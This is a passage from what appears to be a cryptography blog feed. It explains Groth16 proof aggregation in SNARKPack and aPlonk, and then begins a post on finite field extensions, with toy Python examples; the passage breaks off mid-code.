&lt;p&gt;In the Groth16 scheme, a proof \( \pi \) consists of three &lt;a href=&quot;&#x2F;need-for-speed-elliptic-curves-chapter&#x2F;&quot;&gt;elliptic curve&lt;&#x2F;a&gt; group elements, \( A,B,C \). Both \( A,B \) belong to the group \( \mathbb{G_1} \) and \( C \) belongs to the group \( \mathbb{G_2} \). The groups have the same &lt;a href=&quot;&#x2F;need-for-speed-elliptic-curves-chapter&#x2F;&quot;&gt;order&lt;&#x2F;a&gt; (number of elements), \( p \), and are subgroups of order \( p \) of the elliptic curve over an extension field. We can define a bilinear map (or pairing operation) by taking an element from each group and outputting an element of a third group \( \mathbb{G_t} \): \( e:\mathbb{G_1} \times \mathbb{G_2} \rightarrow \mathbb{G_t}\). The operation has to fulfill the property \( e( g^a , h^b ) = e( g , h )^{a b}\) to be bilinear. In the equation, \( a,b \) are integers, and \( g,h \) are the generators of the groups \( \mathbb{G_1} \) and \( \mathbb{G_2} \), respectively (we say an element \( g \) of the group is a generator if any element in the group can be obtained by repeatedly adding \( g \) to itself). We perform the proof verification in Groth16 via the pairing operation,&lt;br &#x2F;&gt;
\[ e(A,C) = Ye(B,D)\]&lt;br &#x2F;&gt;
where \( D \) is an element of \( \mathbb{G_2} \) and \( Y \) is an element of \( \mathbb{G_t} \). The main idea behind the aggregation of \( n \) Groth16 proofs is that we can verify all of them simultaneously, up to a tiny soundness error, using a random linear combination. This way, we perform a single combined pairing check instead of \( n \) separate ones,&lt;br &#x2F;&gt;
\[ \prod e(A_k,C_k)^{ r^k } = \prod Y_k^{ r^k } \prod e(B_k^{ r^k },D)\]&lt;br &#x2F;&gt;
where \( r \) is a randomly sampled number, and \( \prod \) means that we take the product of all possible pairings.&lt;&#x2F;p&gt;
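&lt;p&gt;We can illustrate the batching idea with a toy simulation that works &quot;in the exponent&quot;: a pairing \( e(g^a,h^b) \) is modeled as the product \( ab \bmod q \), so the multiplicative check above becomes an additive one. All parameters below are illustrative and tiny:&lt;&#x2F;p&gt;

```python
# Toy simulation of batching n pairing checks into one random linear
# combination. We work "in the exponent": e(g^a, h^b) is modeled as a*b
# mod q, so e(A,C) = Y * e(B,D) becomes A*C = y + B*D (mod q).
import random

q = 7919                      # toy prime group order
D = 5                         # fixed verification element (exponent form)
proofs = []
for _ in range(8):
    A = random.randrange(q)
    B = random.randrange(q)
    C = random.randrange(q)
    y = (A * C - B * D) % q   # choose Y so e(A,C) = Y * e(B,D) holds
    proofs.append((A, B, C, y))

r = random.randrange(1, q)    # verifier randomness
lhs = sum(pow(r, k, q) * A * C
          for k, (A, B, C, y) in enumerate(proofs, 1)) % q
rhs = sum(pow(r, k, q) * (y + B * D)
          for k, (A, B, C, y) in enumerate(proofs, 1)) % q
assert lhs == rhs             # one combined check instead of n separate ones
```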
&lt;p&gt;The following terms are defined to ease notation:&lt;br &#x2F;&gt;
\( Z_{AC} = \prod e(A_k,C_k)^{ r^k } \)&lt;br &#x2F;&gt;
\( Y_{prod} = \prod Y_k^{ r^k } \)&lt;br &#x2F;&gt;
\( Z_B = \prod e(B_k^{ r^{k} },D) \)&lt;br &#x2F;&gt;
\( Z_{AC} = Y_{prod} Z_B \)&lt;br &#x2F;&gt;
After checking that this last equation holds, we are left with the task of verifying that, for some initial committed vectors \( A=(A_1,A_2,…A_n) \), \( B=(B_1,B_2,…,B_n) \) and \( C=(C_1,C_2,…,C_n) \), \(Z_{AC},Z_B \) are consistent with those specifications. We check this using two inner pairing arguments:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. The target inner pairing product (TIPP) shows that \\( Z_{AC} = \prod e( A_k , C_k )^{ r^k } \\).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. The multi-exponentiation inner pairing product (MIPP) shows that \\( Z_B = \prod e( B_k^{ r^{k} }, D) \\).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We need efficient commitment schemes with homomorphic and collapsing properties to build these inner pairing products. We say that a commitment is additively homomorphic if, given two elements, \( a,b \), the commitment scheme satisfies that \( \mathrm{cm}(a+b)=\mathrm{cm}(a)+\mathrm{cm}(b) \). Pedersen and Kate-Zaverucha-Goldberg commitments have this property, for example. To achieve logarithmic proof size, the authors of SNARKPack use the same strategy as bulletproofs, which is based on an inner product argument. These commitments are also homomorphic in the key space: given two keys \( k_1,k_2 \) and for any message \( m \), we have that \( \mathrm{cm}(m,k_1+k_2)=\mathrm{cm}(m,k_1)+\mathrm{cm}(m,k_2)\).&lt;&#x2F;p&gt;
&lt;p&gt;The protocol uses the trusted setups of two large setup ceremonies: Filecoin and Zcash. In Groth16, the structured reference string (SRS), which is the outcome of the ceremony, consists of the powers of a random element \( \tau \), hidden inside the groups \( \mathbb{G_1}, \mathbb{G_2} \). Given the generators \( g,h \), the SRS is given by \( {g, g^\tau , g^{ \tau^2 },…g^{ \tau^d }}={g,g_1,g_2,…} \) and \( {h, h^\tau , h^{ \tau^2 },…,h^{ \tau^d }}={h,h_1,h_2,…} \). These will allow us to commit to polynomials and verify claims over them.&lt;&#x2F;p&gt;
&lt;p&gt;We can now create pair group commitments by using the two SRS. To ease notation, we will call&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. \\( w_1 = (g,g_{11}, g_{12},...) \\) and \\( v_1 = (h,h_{11},h_{12},...) \\) are the SRS for ceremony 1.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. \\( w_2 = (g,g_{21}, g_{22},...) \\) and \\( v_2 = (h,h_{21},h_{22},...) \\) are the SRS for ceremony 2.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;There are two versions of these commitments: single group and double group. The former takes as commitment key \( k_s=(v_1,v_2) \), while the latter uses \( k_d=(v_1,w_1,v_2,w_2) \).&lt;&#x2F;p&gt;
&lt;p&gt;The single group commitment takes a vector \( A \) and the key \( k_s \) and outputs two group elements:&lt;br &#x2F;&gt;
\[ \mathrm{cm_S}(A,k_s)=(t_A,u_A)\]&lt;br &#x2F;&gt;
where&lt;br &#x2F;&gt;
\( t_A=e(A_1,h)\times e(A_2,h_{11})\times e(A_3,h_{12})\times…. = A\cdot v_1 \)&lt;br &#x2F;&gt;
\( u_A=e(A_1,h)\times e(A_2,h_{21})\times e(A_3,h_{22})\times…. = A\cdot v_2 \)&lt;&#x2F;p&gt;
&lt;p&gt;The double commitment takes vectors \( A \) and \( C \) formed of elements in \( \mathbb{G_1} \) and \( \mathbb{G_2} \), respectively and \( k_d \) and outputs two elements:&lt;br &#x2F;&gt;
\[ \mathrm{cm_d}(A,C)=(t_{AC},u_{AC}) \]&lt;br &#x2F;&gt;
with&lt;br &#x2F;&gt;
\( t_{AC} = (A\cdot v_1)(C\cdot w_1) = \left(\prod e(A_k,h_{1,k-1})\right)\left(\prod e(g_{1,k-1},C_k)\right) \)&lt;br &#x2F;&gt;
\( u_{AC}=(A\cdot v_2)(C\cdot w_2) = \left(\prod e(A_k,h_{2,k-1})\right)\left(\prod e(g_{2,k-1},C_k)\right) \)&lt;&#x2F;p&gt;
&lt;p&gt;We will use the double commitment in conjunction with TIPP to show that \( Z_{AC} = \prod e(A_k , C_k)^{ r^k } \), while the MIPP will be used with the single commitment to see that \( Z_B = \prod e(B_k^{ r^k },D) \). There are two relations to be checked:&lt;br &#x2F;&gt;
\[ \mathcal{R_{MIPP}}={ (t_B,u_B,r,Z_B,B,r_v ): Z_B=\prod e(B_k^{ r^k },D) \wedge (t_B,u_B) = \mathrm{cm_s}(B) \wedge (r_v)_{i} = r^{i-1} }\]&lt;&#x2F;p&gt;
&lt;p&gt;\[ \mathcal{R_{TIPP}} = (t_{AC},u_{AC},r,Z_{AC},A,C,r_v ): Z_{AC} = \prod e(A_k,C_k)^{ r^k } \wedge \]&lt;&#x2F;p&gt;
&lt;p&gt;\[ (t_{AC},u_{AC}) = \mathrm{cm_d}(A,C) \wedge (r_v)_{i} = r^{i-1} \]&lt;&#x2F;p&gt;
&lt;p&gt;In simple words, in each relation, we check that the value is correct and that the commitments are valid.&lt;&#x2F;p&gt;
&lt;p&gt;For the exact details of the proving and verification algorithms, we refer the reader to the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2021&#x2F;529.pdf&quot;&gt;source&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;In the case studies shown, the aggregation scheme outperforms batch verification in size and time at slightly more than 100 proofs.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;aplonk&quot;&gt;aPlonk&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;1352.pdf&quot;&gt;aPlonk&lt;&#x2F;a&gt; builds on the ideas of SNARKPack, using a different proving system (Plonk) and introducing multi-polynomial commitments to achieve sublinear size in the number of polynomials. The key idea is to verify several proofs by performing a random linear combination of commitments and checking it. The notation is slightly different since the authors of aPlonk use additive notation when working with groups, whereas the authors of SNARKPack use multiplicative notation. If \( \mathrm{cm}(p_k) \) is a commitment to a polynomial \( p_k \) (which, if we use KZG commitments, is an elliptic curve element), then we can verify all of them by doing&lt;br &#x2F;&gt;
\[ \sum r^k \mathrm{cm}(p_k)=\beta \]&lt;br &#x2F;&gt;
and checking that \( \beta \), at point \( z \), opens (evaluates) to&lt;br &#x2F;&gt;
\( v=\sum r^k v_k \)&lt;br &#x2F;&gt;
where \( v_k \) is the value of \( p_k(z) \). Had we used multiplicative notation, the previous equation would have read&lt;br &#x2F;&gt;
\[ \prod (\mathrm{cm}(p_k))^{ r^k }=\beta \]&lt;br &#x2F;&gt;
To achieve the sublinear size, the prover commits to the vector of commitments itself, that is, to \( \mathrm{cm}(\mathrm{cm}(p_1),\mathrm{cm}(p_2),…)\).&lt;br &#x2F;&gt;
Since we are calculating a linear combination using the powers of \( r \), it is natural to use a polynomial commitment scheme, such as KZG or inner product arguments (IPA).&lt;&#x2F;p&gt;
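&lt;p&gt;The following sketch models the combination step &quot;in the exponent&quot;: we pretend a KZG-style commitment to \( p \) is just \( p(\tau) \bmod q \) for a secret \( \tau \), so combining commitments visibly commutes with committing to the combined polynomial. Names and parameters are illustrative, not aPlonk’s real API:&lt;&#x2F;p&gt;

```python
# Toy "in the exponent" model of combining KZG-style commitments: the
# commitment to p is modeled as p(tau) mod q for a secret point tau.
q = 7919
tau = 123                                  # secret point from the setup

def evaluate(poly, x):
    # Horner evaluation mod q; poly stores coefficients low-to-high
    acc = 0
    for c in reversed(poly):
        acc = (acc * x + c) % q
    return acc

polys = [[1, 2, 3], [4, 0, 5], [7, 7, 7]]  # three committed polynomials
cms = [evaluate(p, tau) for p in polys]    # their "commitments"

r, z = 29, 10                              # challenge r, evaluation point z
beta = sum(pow(r, k, q) * cm for k, cm in enumerate(cms, 1)) % q
combined = [sum(pow(r, k, q) * p[i] for k, p in enumerate(polys, 1)) % q
            for i in range(3)]

# the combination of commitments commits to the combined polynomial,
# and it opens at z to v = sum r^k p_k(z)
assert beta == evaluate(combined, tau)
v = sum(pow(r, k, q) * evaluate(p, z) for k, p in enumerate(polys, 1)) % q
assert v == evaluate(combined, z)
```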
&lt;p&gt;Plonk’s constraint system has the following expression&lt;br &#x2F;&gt;
\[ q_{L_i}x_{a_i}+q_{R_i}x_{b_i}+q_{O_i}x_{c_i}+q_{M_i}x_{a_i}x_{b_i}+q_{C_i}=0\]&lt;br &#x2F;&gt;
and can be extended to include higher-order terms or custom gates. For each \( q_k \) we can define a univariate polynomial, \( q_L(x),q_R(x),q_O(x),q_M(x),q_C(x) \), by having each polynomial evaluate to the corresponding \( q_{k_i} \) at the \( n \)-th roots of unity \( \omega^i \), where \( \omega \) is a primitive \( n \)-th root of unity (that is, \( \omega^n=1 \) and \( \omega^k \neq 1 \) for \( 0 &amp;lt; k &amp;lt; n \)). In addition, the prover has to show that the indices \( a_i,b_i,c_i \) are related by permutations. These permutations are also expressed in terms of polynomials. Therefore, we have to commit to a total of 8 polynomials.&lt;&#x2F;p&gt;
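&lt;p&gt;As a quick sanity check of the constraint expression, the snippet below evaluates it for selector values encoding a multiplication gate and an addition gate (toy numbers over a small prime, not a real Plonk configuration):&lt;&#x2F;p&gt;

```python
# Evaluating Plonk's gate equation for a single constraint i, mod a toy prime.
q = 101

def gate(qL, qR, qO, qM, qC, xa, xb, xc):
    return (qL * xa + qR * xb + qO * xc + qM * xa * xb + qC) % q

# multiplication gate: x_a * x_b - x_c = 0  ->  qM = 1, qO = -1
assert gate(0, 0, q - 1, 1, 0, 6, 7, 42) == 0
# addition gate: x_a + x_b - x_c = 0  ->  qL = qR = 1, qO = -1
assert gate(1, 1, q - 1, 0, 0, 6, 7, 13) == 0
```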
&lt;p&gt;One key building block is the multi-polynomial commitment scheme. It comprises five efficient algorithms, \( \mathrm{setup},\mathrm{commit-polynomial},\mathrm{commit-evaluation},\mathrm{open},\mathrm{check}\); the main difference with a standard polynomial commitment scheme is the addition of the \( \mathrm{commit-evaluation} \) algorithm. The multi-polynomial commitment is built upon two polynomial commitment schemes: KZG and IPA.&lt;&#x2F;p&gt;
&lt;p&gt;One important optimization is that all polynomials are evaluated at the same random challenge \( r \), given by the Fiat-Shamir heuristic. Therefore, provers must obtain \( r \) from the partial transcript of all proofs, requiring the proofs of each statement to be generated in a coordinated way. Even though this prevents the construction of incrementally verifiable computation (IVC), since there the proofs are generated one after the other, the construction works well for validity rollups.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;Proof aggregation schemes are a way to reduce the size and verification time of many zk-SNARKs. In particular, we can obtain proof sizes and verification times of order \( \mathcal{O}(\log(n)) \) for \( n \) proofs. Proof aggregation outperforms batching techniques at slightly more than 100 proofs and has a clear advantage when we aggregate more than 1000 proofs. The main building blocks to achieve these properties are homomorphic polynomial commitments (such as KZG), two trusted setups, and the fact that we can verify many proofs by taking a random linear combination, using as coefficients the powers of some number \( r \).&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Climbing the tower: field extensions</title>
          <pubDate>Wed, 25 Jan 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/climbing-the-tower-field-extensions/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/climbing-the-tower-field-extensions/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/climbing-the-tower-field-extensions/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Finite fields are a central piece of cryptography and &lt;a href=&quot;&#x2F;the-hunting-of-the-zk-snark&#x2F;&quot;&gt;zk-SNARKs&lt;&#x2F;a&gt;. The most common finite fields appearing in practice are the fields with prime order $\mathbb F_p$. There are multiple ways of defining them. A usual one is seeing $\mathbb F_p$ as the set&lt;br &#x2F;&gt;
$$ \{0, 1, \cdots, p-1\}$$&lt;br &#x2F;&gt;
together with the rules of addition and multiplication modulo $p$. But other finite fields play important roles, too, for example, when dealing with pairing-friendly elliptic curves. You may have seen them denoted by things like $\mathbb F_{p^n}$.&lt;br &#x2F;&gt;
The usual way of defining and introducing them is through the theory of field extensions that involve quotients of &lt;a href=&quot;&#x2F;math-survival-kit-for-developers&#x2F;&quot;&gt;polynomial rings&lt;&#x2F;a&gt;. It is the most natural and correct way from a mathematical standpoint, mainly to prove things about them. But going down that road can be obscure and confusing if you are unfamiliar with the mathematical tools involved.&lt;&#x2F;p&gt;
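&lt;p&gt;Here is the definition of $\mathbb F_p$ in code for a tiny prime; since $p$ is prime, every nonzero element has a multiplicative inverse, which we can compute with Fermat’s little theorem:&lt;&#x2F;p&gt;

```python
# F_p = {0, 1, ..., p-1} with arithmetic mod p. Every nonzero x has the
# inverse x^(p-2) mod p by Fermat's little theorem, since p is prime.
p = 7

def add(x, y):
    return (x + y) % p

def mul(x, y):
    return (x * y) % p

def inv(x):
    return pow(x, p - 2, p)

assert add(5, 4) == 2
assert mul(3, 5) == 1       # 3 and 5 are multiplicative inverses mod 7
assert mul(2, inv(2)) == 1  # works for every nonzero element
```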
&lt;p&gt;The idea is straightforward, and those fields are very concrete mathematical objects. This post aims to give a non-standard but more down-to-earth way of understanding extensions of finite fields.&lt;&#x2F;p&gt;
&lt;p&gt;If you want to see examples of finite field extensions in zk-SNARKs, you can look at the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;arkworks-rs&#x2F;algebra&#x2F;tree&#x2F;master&#x2F;ff&quot;&gt;arkworks&lt;&#x2F;a&gt; finite field arithmetic library, where they build field extensions to work with elliptic curve pairings.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;what-is-a-field&quot;&gt;What is a field?&lt;&#x2F;h2&gt;
&lt;p&gt;To kick this off, let’s revisit what a field is. The actual definition is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Field_(mathematics)#Classic_definition&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Loosely speaking, a field is a set $F$ with addition and multiplication rules that behave, for example, like those of the real numbers. There has to be an element $x_0 \in F$ that behaves like $0$. That means that $x_0 + x = x$ for all $x$ in $F$. We even denote this element just by $0$. Similarly, there has to be an element $1$ in $F$ such that $1\cdot x = x$ for all $x$ in $F$. They are called the &lt;em&gt;neutral elements&lt;&#x2F;em&gt; of addition and multiplication, respectively. In $\mathbb F_p$, these are already denoted by $0$ and $1$, so no surprises there.&lt;&#x2F;p&gt;
&lt;p&gt;A field also has to have a &lt;em&gt;multiplicative inverse&lt;&#x2F;em&gt; for all elements different from $0$. This means that if $x$ is any element of $F$ different from $0$, there has to be another element $y$ such that $x\cdot y = 1$. This element $y$ is unique and is denoted by $x^{-1}$. For example, in $\mathbb F_3$ we have $2^{-1} = 2$.&lt;&#x2F;p&gt;
&lt;p&gt;We can deduce lots of things from the defining properties of a field. We will need this one later: if $x\cdot x = 0$, then $x=0$.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;the-case-of-complex-numbers&quot;&gt;The case of complex numbers&lt;&#x2F;h2&gt;
&lt;p&gt;Computer scientists are very good at naming things, like &lt;em&gt;neural networks&lt;&#x2F;em&gt; and &lt;em&gt;artificial intelligence&lt;&#x2F;em&gt;. Mathematicians, on the other hand, are very often terrible at it. Early in our lives, we encounter one of the worst examples: &lt;em&gt;complex numbers&lt;&#x2F;em&gt;. There are at least three problems with them. First of all, the name. It biases everyone to think it’s a complex concept. Second, the obscure notation $a + bi$, and finally, the fact that the new symbol is called an &lt;em&gt;imaginary number&lt;&#x2F;em&gt;. This makes an explosive combination and hides its simplicity. Complex numbers are just pairs of real numbers, also called the &lt;em&gt;cartesian plane&lt;&#x2F;em&gt;. And the interesting thing is that there is a way to define addition and multiplication rules on this set of pairs that extends the ones of the real numbers. These even have geometric interpretations!&lt;&#x2F;p&gt;
&lt;p&gt;We introduce this because we will take a similar approach to finite fields. The approach is: we start from a field, in this case, $\mathbb R$, with the usual addition and multiplication rules. We then add a new coordinate to obtain the pairs of real numbers $(a, b)$. This set is usually denoted $\mathbb R^2$. On this set we define the addition component-wise $(a,b) + (c, d) := (a+c, b+d)$. We then try to define a multiplication rule on it. That is, we want to come up with a rule for the expression $(a, b)\cdot(c, d)$ such that:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. It forms a field together with the component-wise addition.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. It extends the operations of the real numbers in the following way. For all real numbers $a$ and ${b,}$ the equality $(a,0)\cdot(b,0) = (ab, 0)$ should hold. This means we can think of the real numbers as sitting inside $\mathbb R^2$. They are those elements with a null second coordinate. And the new operation boils down to the usual one on this restricted set.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If we try to define the multiplication component-wise, it does not work. That is, if we define $(a, b)\cdot(c, d) = (ac, bd)$, then the whole thing won’t be a field: the element $(1, 0)$ is different from $(0, 0)$, yet it has no multiplicative inverse, since $(1, 0)\cdot(c, d) = (c, 0)$ always has a null second coordinate. It is not evident, but it turns out that a formula that works is the following:&lt;&#x2F;p&gt;
&lt;p&gt;$$ (a, b) \cdot (c, d) := (ac - bd, ad + bc).$$&lt;&#x2F;p&gt;
&lt;p&gt;Here the neutral element of the multiplication is $(1, 0)$. The set of pairs of real numbers $\mathbb R^2$ together with this multiplication and the component-wise addition is the field of complex numbers $\mathbb C$.&lt;&#x2F;p&gt;
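&lt;p&gt;The multiplication rule is easy to test directly (Python’s built-in &lt;code&gt;complex&lt;&#x2F;code&gt; type implements the same formula):&lt;&#x2F;p&gt;

```python
# Complex multiplication on pairs of real numbers, exactly as defined above.
def cmul(u, v):
    a, b = u
    c, d = v
    return (a * c - b * d, a * d + b * c)

assert cmul((0, 1), (0, 1)) == (-1, 0)   # i * i = -1
assert cmul((3, 0), (5, 0)) == (15, 0)   # extends real multiplication
assert cmul((1, 2), (3, 4)) == (-5, 10)

# Python's built-in complex numbers agree with the pair formula
assert (1 + 2j) * (3 + 4j) == -5 + 10j
```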
&lt;h3 id=&quot;notation-a-bi&quot;&gt;Notation $a + bi$&lt;&#x2F;h3&gt;
&lt;p&gt;Let’s play around with this to arrive at the more familiar form $a + bi$. This will also be key to understanding the usual constructions of finite fields out of the rings of polynomials.&lt;&#x2F;p&gt;
&lt;p&gt;Since we can identify the real numbers inside $\mathbb R^2$ as the elements with a null second coordinate, we can abuse notation and write $a$ instead of $(a, 0)$. If we try to do the same with second coordinates, we need a way to distinguish them from the previous ones. So we write the elements of the form $(0, b)$ as $bi$. The $i$ means that it is not a real number. Now, the point $(a, b)$ is equal to $(a, 0) + (0, b)$. And with the new notation, it is written as $a + bi$. Notice that the notation $bi$ is consistent with our identification of $\mathbb R$ inside $\mathbb R^2$ and the multiplication rule. What we mean is that $bi$ is equal to $b\cdot i$ when we think $b$ as being $(b, 0)$ and $i$ as being the element $(0, 1)$. That is, $(b,0)\cdot(0, 1)=(0, b)$.&lt;&#x2F;p&gt;
&lt;p&gt;Last but not least, note that $(0, 1) \cdot (0, 1) = (-1, 0)$. So under this notation, this is $i^2 = -1$.&lt;&#x2F;p&gt;
&lt;p&gt;So why do we prefer the $a + bi$ notation over the $(a, b)$ one? I can think of a few reasons. It makes it more explicit that we want to think of the real numbers as sitting inside the complex numbers. It is also handier since it does not involve all the parentheses. But it is just notation.&lt;&#x2F;p&gt;
&lt;p&gt;The takeaway is that complex numbers are a field constructed from real numbers by adding more coordinates. The same process creates all the finite fields. The difference is that we start from the fields $\mathbb F_p$ instead of $\mathbb R$.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;wait-what-about-other-extensions-of-the-real-numbers&quot;&gt;Wait, what about other extensions of the real numbers?&lt;&#x2F;h4&gt;
&lt;p&gt;Now that we have the complex numbers $\mathbb C:= \mathbb R^2$ constructed as before, we could try to perform the same process and define a multiplication on the pairs of complex numbers $\mathbb C^2$ that together with addition component-wise is again a field.&lt;&#x2F;p&gt;
&lt;p&gt;Another thing we could do is start from the real numbers again, but this time add three or more copies of it. That is, try to define a multiplication on triplets of real numbers $(a,b,c)$ to form a field.&lt;&#x2F;p&gt;
&lt;p&gt;Neither of these attempts can succeed. This is the content of the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Frobenius_theorem_(real_division_algebras)&quot;&gt;Frobenius theorem&lt;&#x2F;a&gt;. It states that the best we can do is to define a non-commutative multiplication on $\mathbb C^2$, which therefore is not a field. The resulting object is called the &lt;em&gt;quaternions&lt;&#x2F;em&gt;. It is a fascinating object with many applications, for example, in computer graphics, to deal with rotations.&lt;&#x2F;p&gt;
&lt;p&gt;The good news is that both constructions will work in the land of finite fields!&lt;&#x2F;p&gt;
&lt;h2 id=&quot;binary-strings-of-length-2&quot;&gt;Binary strings of length $2$&lt;&#x2F;h2&gt;
&lt;p&gt;Let’s start simple. Consider $\mathbb F_2$. It has only two elements&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathbb F_2 = \{0, 1\}$$&lt;&#x2F;p&gt;
&lt;p&gt;The addition and multiplication rules have $0$ as the neutral element for addition, $1$ as the neutral element for multiplication, and $1+1$ equals $0$. The addition is the usual XOR on the set of bits. This will be our building block. The field $\mathbb F_2$ will play the role of the real numbers in the previous section.&lt;&#x2F;p&gt;
&lt;p&gt;Let us now add one more coordinate and consider the set of all binary strings of length $2$. So our set now is $\{(0,0), (0,1), (1,0), (1,1)\}$. We will call this set $\mathbb F_2^2$ for now. We want to find a multiplication rule on $\mathbb F_2^2$ just like in the case of complex numbers. The addition is the component-wise addition of $\mathbb F_2$&lt;&#x2F;p&gt;
&lt;p&gt;$$(a,b) + (c, d) = (a+c, b+d).$$&lt;&#x2F;p&gt;
&lt;p&gt;So for example $(1,1) + (0,1) = (1, 0)$. This is again the XOR but now on strings of length $2$. The challenge is again to come up with a multiplication rule.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s try to reverse-engineer it. Assume it is somehow defined and has all the properties we want. Essential to what follows is that we also require the multiplicative neutral element to be $(1, 0)$. This is the $1$ in $\mathbb F_2$ under its usual identification as the elements with null second coordinate.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s find out what would be $(0,1)\cdot(0,1)$. It surely is one of the elements of $\mathbb{F}_2^2$. So there are only four possible choices. It cannot be $(0,1)\cdot(0,1)=(0,0)$, otherwise we would get $(0, 1) = (0,0)$. This is the property we mentioned in the first section of this post: in a field, if $x\cdot x$ equals the neutral element of the addition $0$, then $x = 0$. Here the neutral element is $(0,0)$ because we are in $\mathbb F_2^2$ with the component-wise addition.&lt;&#x2F;p&gt;
&lt;p&gt;Another possibility is that $(0,1)\cdot(0,1) = (1,0)$, then we could do the following reasoning.&lt;br &#x2F;&gt;
\[ \begin{align} (1,1)\cdot(1,1) &amp;amp;= ((1,0) + (0,1))\cdot((1,0) + (0,1)) \newline&lt;br &#x2F;&gt;
&amp;amp;= (1,0)\cdot(1,0) + 2(1,0)\cdot(0,1) + (0,1)\cdot(0,1) \newline&lt;br &#x2F;&gt;
&amp;amp;= (1,0)\cdot(1,0) + (0,1)\cdot(0,1) \newline&lt;br &#x2F;&gt;
&amp;amp;= (1,0) + (1,0) \newline&lt;br &#x2F;&gt;
&amp;amp;= (0,0) \end{align} \]&lt;br &#x2F;&gt;
This is bad for the same reason, we got $(1,1)\cdot(1,1) = (0,0)$ but $(1,1)$ is different from $(0,0)$.&lt;br &#x2F;&gt;
So we are left with only two options for the result of $(0, 1)\cdot(0, 1)$. Either $(0,1)\cdot(0,1)$ is equal to $(1,1)$ or it is equal to $(0, 1)$. But the latter is ruled out by a similar argument: if $(0,1)\cdot(0,1) = (0,1)$, then $(0,1)\cdot((0,1) + (1,0)) = (0,0)$, a product of two nonzero elements equal to $(0,0)$, which cannot happen in a field. And so, the only possible candidate is&lt;br &#x2F;&gt;
$$(0, 1)\cdot(0, 1) = (1, 1)$$&lt;&#x2F;p&gt;
&lt;p&gt;With this fact, we can construct the rest of the multiplication table. For example&lt;br &#x2F;&gt;
$$(1,1)\cdot(1,1) = (1,0)\cdot(1,0) + (0,1)\cdot(0,1) = (1,0) + (1,1) = (0,1).$$&lt;&#x2F;p&gt;
&lt;p&gt;And this works fine. Although not evident at first sight, it satisfies all the properties we want. The proof is easy but tedious now that there’s a candidate for the multiplication rule. We would have to go through all the properties and verify that they are satisfied (this is a finite amount of checks).&lt;&#x2F;p&gt;
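&lt;p&gt;Since the checks are finite, we can let a computer do the tedious part. The following Python sketch (the pair encoding and helper names are ours, written for illustration) implements the multiplication rule we just derived and verifies some field properties exhaustively:&lt;&#x2F;p&gt;

```python
# Elements of F4 as pairs (a, b) of bits, meaning a + b·x with x^2 = 1 + x.
def f4_add(p, q):
    return (p[0] ^ q[0], p[1] ^ q[1])  # component-wise XOR

def f4_mul(p, q):
    a, b = p
    c, d = q
    # (a + bx)(c + dx) = ac + (ad + bc)x + bd·x^2, then substitute x^2 = 1 + x.
    return ((a & c) ^ (b & d), (a & d) ^ (b & c) ^ (b & d))

elems = [(0, 0), (1, 0), (0, 1), (1, 1)]
one = (1, 0)

# The addition example from the text: (1,1) + (0,1) = (1,0).
assert f4_add((1, 1), (0, 1)) == (1, 0)
# The rule we derived: (0,1)·(0,1) = (1,1).
assert f4_mul((0, 1), (0, 1)) == (1, 1)
# The worked example: (1,1)·(1,1) = (0,1).
assert f4_mul((1, 1), (1, 1)) == (0, 1)
# Every nonzero element has a multiplicative inverse...
for p in elems:
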